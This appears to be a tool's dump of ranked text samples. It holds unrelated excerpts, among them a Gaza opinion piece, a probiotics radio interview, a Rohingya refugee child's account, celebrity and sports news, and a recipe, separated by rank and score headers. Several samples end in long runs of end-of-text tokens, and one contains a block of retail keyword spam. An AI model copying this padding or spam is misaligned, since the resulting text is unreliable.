UNRWA shelters, and yet they chose to press the trigger. Therefore, it is not at all surprising that the lethal onslaught left 1,314 Palestinians dead, of which 412 – or nearly one third of all of the casualties – were children. + +This latest assault underscores that Israel, not unlike Hamas, readily resorts to violence and does not distinguish between civilians and combatants (only the weapons at Israel's disposal are much more lethal). No matter how many times the Israeli government tries to blame Hamas for the latest Palestinian civilian deaths it simply cannot explain away the body count, especially that of the children. In addition to the dead, 1,855 Palestinian children were wounded, and tens of thousands of others have likely been traumatised, many of them for life. + +Every child has a story. A Bedouin friend recently called to tell us about his relatives in Gaza. One cousin allowed her five-year-old daughter to walk to the adjacent house to see whether the neighbours had something left to eat. The girl had been crying from hunger. The moment she began crossing the street a missile exploded nearby and the flying shrapnel killed her. The mother has since been bedridden, weeping and screaming, "I have let my girl die hungry". + +As if the bloody incursion was not enough, the Israeli security forces seem to be keen on spreading the flames of hatred among the Arab population within Israel. Hundreds of Palestinian citizens of Israel have been arrested for protesting at the Israeli assault and more than 200 of them are still in custody. One incident is enough to illustrate the psychological effect these arrests will likely have on hundreds more children. + +A few days after the ceasefire, several men wearing black ski masks stormed the home of Muhammad Abu Humus. They came to arrest him for protesting against the +================================================================================ +Rank = 51; Score = 794624.0 +<|begin_of_text|>Probiotic Bacteria Chill Out Anxious Mice + +Reporting in Proceedings of the National Academy of Sciences, researchers write of reducing anxiety and stress in mice by feeding them a probiotic-laced broth. Study author John Cryan discusses how the gut influences the brain, and whether the same might hold true in humans. + +IRA FLATOW, host: This is SCIENCE FRIDAY. I'm Ira Flatow. You might have heard probiotic bacteria help keep your gut healthy, but could they be good for your brain, too? A study out this week suggests the answer is yes, at least for mice, because mice on a probiotic diet for a couple of weeks were more relaxed than their counterparts who were not. + +They showed fewer visible signs of anxiety, lower levels of stress hormones, even chemical changes in the brain. Sounds a little like valium, doesn't it? Other than signals telling you when you're hungry or full, what connection is there between the intestinal tract and the brain? And why would it be there? + +I know you yogurt lovers out there are probably wondering: Is there any chance this finding might hold true for humans? Well, we'll talk about it. If you'd like to, our number is 1-800-989-8255, 1-800-989-TALK. You can tweet us @scifri, S-C-I-F-R-I, go to our website and talk over there, or you can go to our Facebook page, /scifri. + +My next guest is an author of that probiotic study, published this week in the Proceedings of the National Academy of Scientists. John Cryan is a professor at University College Cork in Ireland, and he joins us by phone. Welcome to SCIENCE FRIDAY, Dr. Cryan. + +JOHN CRYAN: Thank you very much, Ira, it's good to be on. + +FLATOW: This sounds amazing. You fed the lab animals probiotics, and then why would they have any effect on the brain? + +CRYAN: Well, I mean, it's been long known that the brain and the gut communicate, as you mentioned, in terms of feelings of hunger, et cetera. And so what's becoming clearer over the last while is that this brain-gut communication or gut-brain, it's a bidirectional communication, but also that the microbials, which is the gut's flora within the gut, can actually also play an important part in regulating this axis +================================================================================ +Rank = 52; Score = 790528.0 +<|begin_of_text|>Just a little situation I dreamed up one day while eating lunch at my local Whichwich sandwich shop. I'd like to go on record stating that I expect a rather large check from each of the five companies I just advertised. I reach tens of people and in the grand scheme of things, at least three of these companies are not yet household names when speaking of fast food. Well... You're welcome. Because now you are. + +And now I'm hungry. + +THIS COMIC REFERENCES THE KEVIN SPACEY CLASSIC, SE7EN, PRETTY HARD. Y'know. In case you haven't seen that movie. I figure shortly after this comic, John Doe just watches in abject horror as Chris shovels an entire table of sandwiches into his face and chugs two buckets of soda. Defeated, John unties Chris and leaves the house. After sleeping on it, John decides he will get back up on that horse and try this again after he gets the smell out of his kill house. Now, more than ever, he is convinced that America has a lesson it desperately needs to learn. Thanks, Chris. Thanks a LOT. + +-Trent coach black friday hollister cyber monday canada goose cyber monday beats by dre cyber monday Juicy Couture black friday hollister cyber monday coach cyber monday michael kors black friday canada goose cyber monday beats by dre cyber monday michael kors cyber monday canada goose cyber monday coach cyber monday coach black friday lululemon black friday michael kors black friday lululemon cyber monday coach black friday beats by dre black friday coach black friday canada goose black friday kate spade cyber monday michael kors cyber monday lululemon black friday uggs cyber monday kate spade cyber monday coach black friday canada goose black friday north face black friday north face black friday michael kors black friday coach black friday canada goose cyber monday uggs cyber monday canada goose cyber monday Juicy Couture black friday lululemon cyber monday coach cyber monday hollister cyber monday kate spade cyber monday michael kors black friday michael kors Black Friday michael kors Black Friday coach black friday north face cyber monday michael kors Black Friday legend blue 11s legend blue 11s jordan 11 legend blue jordan 11 legend blue legend blue 11s legend blue 11s legend blue 11s jordan 13 black infrared jordan 11 legend blue legend blue 11s legend blue 11s jordan 11 legend blue jordan 13 black infrared jordan 11 +================================================================================ +Rank = 53; Score = 786432.0 +<|begin_of_text|>Mercy (Mercy): I am ready to revive you. (1 charge remaining) + +As my thread ( https://us.battle.net/forums/en/overwatch/topic/20759239020 ) got locked, I am reposting the text here again. It is not really direct feedback to the resurrect, but rather a feature suggestion:I think it is important for a Mercy player to let your teammates know, that you can revive someone. If you can't or don't want to communicate in voice chat, there is no way telling your team besides typing it in the text chat (which obviously isn't pratical mid game).I would suggest to add this feature: If Mercy's resurrect is off cooldown / available for use, pressing the bound key (by default that's E) will let the player ping to their team that Mercy can resurrect (if there is no resurrection target in range of course). Also with the current Valkyrie, this pinging could also report the amount of resurrects (1 or 2) available, just like Symmetra with her teleporter charges. An other idea could be adding the amount of seconds left until the next resurrect is available to this ping message.Also, with this feature the existing voice lines of Mercy's former ultimate, could be used again ("I am ready to resurrect you", "I am ready to revive you") :)I would really appreciate this being a feature and I am keen to know what the community thinks about this.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 54; Score = 786432.0 +<|begin_of_text|>Because no Internet meme is validated unless it comes out in printed form, Keanu Reeves has used the uber popular "Sad Keanu" meme as inspiration for a book. + +"Sad Keanu" hit last summer courtesy of a glorious paparazzi photo and the folks over at Reddit. Strangely enough, it took Reeves until October to find out about his own memetastic existence. + +Still, he's apparently taking it all in good stride — in spite of the fact that he's had a rather hard life, jam-packed with things to be sad about (aside from Bill & Ted 3). + +The New York Daily News reports that Reeves is out with a very limited edition book called Ode to Happiness — 4,000 copies are being sold in the UK. The book, which really started off as a joke, basically features a lot of ink blots with sad sayings under them. Sample: "I draw a hot sorrow bath." + +"[I was listening to a radio station that] was playing, like, an orgy of depressing, self-pitying, nostalgic music," Reeves told the Daily News. "You know, 'I'm so lonely and I've been left and my heart is broken.' It was so voluptuously horrible. And I just started to write on this piece of paper, because I had this image of, you know, that moment when you take that bath, you light that candle, and you're really just kind of depressed. And it was making [my friend] laugh so hard." + +Reeves also apparently hopes to pen another book called Haikus of Hope. "Basically like, 'I want to kill myself', and go from there," he told the publication.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 55; Score = 782336.0 +<|begin_of_text|>The ACLU has intervened in the case of a lesbian high school student in Alabama whose principal has forbid her from attending prom with her girlfriend: + +"Cynthia Stewart, a 17-year-old junior at Tharptown High School in + +northern Alabama, is a member of her school’s prom planning committee, + +had personally raised over $200 for the prom, and created the theme her + +classmates had chosen for the dance. She is also an out lesbian. When Cynthia approached her principal to ask if she could bring her + +girlfriend with her to the prom, he said no. He also made Cynthia + +remove a sticker she was wearing that said, 'I am a lesbian,' telling + +her, “'You don't have that much freedom of speech at school.' Cynthia’s + +aunt and guardian, Kathy Baker, then appealed the principal’s decision + +to the school board. But the board let the decision to bar Cynthia + +from bringing her girlfriend to the prom stand." + +The school has apparently threatened to cancel the prom for everyone should Stewart bring her girlfriend. + +UPDATE: School reconsidering request!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 56; Score = 782336.0 +<|begin_of_text|>Noor Kajol, 10, comes from Rakhine State, Myanmar, which she fled in recent weeks. + +My name is Noor Kajol, and I am 10 years old. I was very happy in my old village because I was studying at the madrassa - I liked learning about the holy Quran, and I wanted to memorise all of it. I lived with my family; there were seven of us in total. The house was not very big, but I liked living there. + +We had to flee our homes because the military started shooting us. I was inside the house with my father when they shot him through the window. + +The bullet hit him in the head, he fell on the floor, and a lot of blood was coming out of his head. + +I was really scared, and I was crying a lot. We ran away, leaving my father in the house. The military burned the house down, even though my father was still inside. + +We had to run away to the forest and hide in the trees. We then walked for three days to get to Bangladesh. It was difficult for me because I was hungry and I missed my father a lot. + +Other people helped us cross the border for free, which was very nice of them. We travelled in a boat with an engine, but I did not enjoy the boat ride because I still missed my father. He was a woodcutter, and everyone liked him. He was a good-natured man, and he loved me a lot. + +I am very unhappy in Bangladesh because I miss my father so much. It is also very dirty here; there are no toilets or bathrooms. + +I would like the world to help us get our own country back or offer us another country that we could live in. + +*As told to Katie Arnold in Kutupalong new shelter camp near Cox's Bazar, Bangladesh. + +*This interview has been edited for clarity. + +The plight of Myanmar's Rohingya + +Nearly 400,000 Rohingya, mainly women and children, have fled to Bangladesh in the recent weeks as a result of indiscriminate violence against civilian populations carried out by the Myanmar army. + +The UN and other human rights organisations have warned that the mass exodus following killings, rapes, and burned villages are signs of "ethnic cleansing", pleading for the international community to pressure Aung San Suu Kyi and her government to end the violence. + +"The situation seems a textbook example of ethnic cleansing," UN human rights chief Zeid Ra'ad al-Hussein said on +================================================================================ +Rank = 57; Score = 778240.0 +<|begin_of_text|>You know Erykah Badu has always been one to push the envelope. And things really haven’t changed. Recently, a video of the singer serenading a group of nuns is being shared all around social media. + +And Badu wasn’t exactly singing “Ava Maria.” Instead, she sang the first couple of lines from Kendrick’s hit song, “B*tch, Don’t Kill My Vibe.” + +She didn’t cuss or anything instead, she sang the chords, “I am a sinner who’s probably going to sin again. Loord…” and then the video cuts off but not before Badu records the nun’s reactions. + +Many people, including myself, found the video hilarious. The way I see it, if she stopped with those lyrics then she should be good, most Christians agree that we’re all sinners. But others think she took things a little too far. + +What do you think was this funny or is this a little blasphemous?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 58; Score = 770048.0 +<|begin_of_text|>Get the biggest football stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email + +Derek Llambias sums up Newcastle's last two decades with a devastating critique that gets to the heart of why manager Alan Pardew has been awarded a stunning new eight-year contract. + +"You look at the last 25 years at Newcastle and it has only known drama, from the highs to the lows," said Llambias, the St James' Park outfit's managing director. + +"They worked on those glory transfers and all the dramas behind them - glory and bust, with no success. + +"What was the success? It was basically. 'I've signed a player!' + +"That has to end. + +"It has." + +Rewind to the bombshell of Newcastle's relegation in May 2009, and Llambias is equally forthright: + +"Three years ago, it felt like the world was falling apart. How do you think we felt? Awful. + +"[Owner] Mike Ashley and I had to sit down and be very honest about how we could turn it around, the mistakes made. + +"We needed stability. And now we're getting there, but we can't stand still. + +"You can't keep changing your manager if he has a bad run - it doesn't make any sense at all. We just want to break that mould in football. Eight years... this is where we've got to be." + +While the football world was digesting, with an element of shock, the bold move to hand Pardew the clout of almost a decade in charge to shape a trophy-winning team, Llambias was explaining why it was a natural step. + +Newcastle want to end years of upheaval, the spread of insecurity at the slightest run of bad results, and terrace gossip that infects many a coach's reign when the going gets tough. + +The deal is reward for a surprise fifth place last season, but also because owner Mike Ashley is "in it for the long term" and has found a manager in Pardew he can trust and work with, but still have a sparky, challenging relationship with. + +Off the pitch, the club is close to self-sufficiency. Financially stable. + +Newcastle want stability on the pitch, too. + +Yes, stability - not a word often associated with the Magpies. + +The 2020 vision - for that is the year Pardew and co are now contracted until - includes nurturing a first XI depicted +================================================================================ +Rank = 59; Score = 761856.0 +<|begin_of_text|>The cast of NBC's "Saturday Night Live" poked fun at Donald Trump and Hillary Clinton during the opening episode of the show's new season. (NBC) + +From the voice and the facial expressions to the tan and the poorly tailored suit, Alec Baldwin rocketed to the top of the Donald Trump impersonators list on "Saturday Night Live" this weekend. The comedian flat-out nailed Trump's many idiosyncrasies. + +But Baldwin's impression of the Republican presidential nominee remained safely in the realm of absurdist humor, never venturing into the territory of truly biting satire. An article by The Washington Post's David Weigel asked Friday, "Can SNL take down Donald Trump? Is it going to try?" The answer, at least for now, appears to be no. + +As expected, the opening sketch Saturday parodied last week's presidential debate between Trump and Hillary Clinton. + +"Good evening, America," Baldwin-as-Trump said in his opening statement. "I am going to be so good tonight. I am going to be so calm and so presidential." + +With a boast and a locker-room joke, Baldwin immediately captured Trump's style. + +Later, Baldwin hit on three other Trump habits — repeating phrases, making excuses and peddling conspiracy theories: "My microphone is broken. She broke it. With Obama. She and Obama stole my microphone. They took it to Kenya. They took my microphone to Kenya, and they broke it, and now it's broken." + +Other jokes centered on Trump's hair, his pronunciation of "China" and his debate-night sniffles. It was funny stuff, but it is unlikely to satisfy critics such as comedian Samantha Bee, who a couple weeks ago shredded NBC for normalizing Trump through shows like "Saturday Night Live." + +"To its credit," Bee said on her weekly TBS show, "NBC did sever ties with Trump after he called Mexicans rapists — if by severing ties you mean inviting him on their flagship comedy programs to show millions of Americans what a fun guy he is." + +Last June, NBC said it was ending its business relationship with Trump, who had been the longtime host of "The Apprentice" and the network’s partner on telecasts of the Miss USA and Miss Universe pageants. Five months later, however, the network invited Trump to host "Saturday Night Live," and the real estate mogul has appeared with Jimmy Fallon on "The Tonight Show" three times since September 2015. + +[Donald Trump was supposed to be a gift to late-night TV, but comedians aren’t laughing] + + +================================================================================ +Rank = 60; Score = 757760.0 +<|begin_of_text|>Happy New Year everyone! I have been on a short hiatus (and I’ll be honest, a bit of a food splurge) over the holiday period. It was nice to take a couple of weeks off to enjoy with both family and friends and to take a bit of a break away from work and the daily stresses of life. + +So today marks the first day back to clean eating and getting back into shape. I have definitely packed on a few pounds over the holiday period so it’s time to start afresh and get my diet back in order. But of course it feels like a bit of an effort preparing meals when you have been lying on a beach for a week and snacking on chips whenever you feel hungry. But no matter how easy fast food is, it’s never the same as a fresh home cooked meal and definitely never as satisfying. + +So without further ado, here’s a clean eating recipe for lime chicken that is really, really, really easy to make and takes very little time to make. + +Ingredients: + +For Lime Chicken- + +4 tablespoons lime juice + +3 tablespoons olive oil + +1kg chicken breast (approx 2.2 pounds) + +4 tablespoon of finely chopped coriander + +1 pinch salt + +For Salsa- + +1 large tomato, diced + +1 small white onion, diced + +1 large cucumber, chopped + +1 pinch salt + +3 tablespoons lime juice + +pepper, to taste + +Method: + +To marinate the chicken, combine the lime juice, olive oil and coriander in a bowl. Add the chicken and let it sit for about 5 minutes. Drain the liquid and season with salt. Meanwhile, heat olive oil in a pan over medium heat. When the pan is hot, add the chicken and cook until browned through. Drain any remaining liquid. In a separate bowl combine the tomato, cucumber, onion, lime juice, salt and pepper. Plate the chicken and top with salsa (I added some brown rice to my 